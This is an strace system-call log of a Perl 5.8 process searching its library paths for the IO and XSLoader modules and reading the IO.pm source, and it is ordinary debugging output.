10029 07:31:00.036642 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

10029 07:31:00.036685 getppid()         = 10027

10029 07:31:00.036744 stat64("/etc/perl/IO.pmc", 0xbfdc331c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036758 stat64("/etc/perl/IO.pm", 0xbfdc322c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036771 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfdc331c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036783 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfdc322c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036796 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfdc331c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036809 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfdc322c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036822 stat64("/usr/lib/perl5/IO.pmc", 0xbfdc331c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036834 stat64("/usr/lib/perl5/IO.pm", 0xbfdc322c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036846 stat64("/usr/share/perl5/IO.pmc", 0xbfdc331c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036858 stat64("/usr/share/perl5/IO.pm", 0xbfdc322c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036871 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfdc331c) = -1 ENOENT (No such file or directory)

10029 07:31:00.036884 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

10029 07:31:00.036904 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

10029 07:31:00.036917 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3038) = -1 ENOTTY (Inappropriate ioctl for device)

10029 07:31:00.036928 _llseek(6, 0, [0], SEEK_CUR) = 0

10029 07:31:00.036950 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

10029 07:31:00.037005 stat64("/etc/perl/XSLoader.pmc", 0xbfdc2e6c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037021 stat64("/etc/perl/XSLoader.pm", 0xbfdc2d7c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037043 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfdc2e6c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037058 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfdc2d7c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037113 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfdc2e6c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037127 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfdc2d7c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037141 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfdc2e6c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037152 stat64("/usr/lib/perl5/XSLoader.pm", 0xbfdc2d7c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037166 stat64("/usr/share/perl5/XSLoader.pmc", 0xbfdc2e6c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037178 stat64("/usr/share/perl5/XSLoader.pm", 0xbfdc2d7c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037205 stat64("/usr/lib/perl/5.8/XSLoader.pmc", 0xbfdc2e6c) = -1 ENOENT (No such file or directory)

10029 07:31:00.037217 stat64("/usr/lib/perl/5.8/XSLoader.pm", {st_mode=S_IFREG|0644, st_size=3408, ...}) = 0

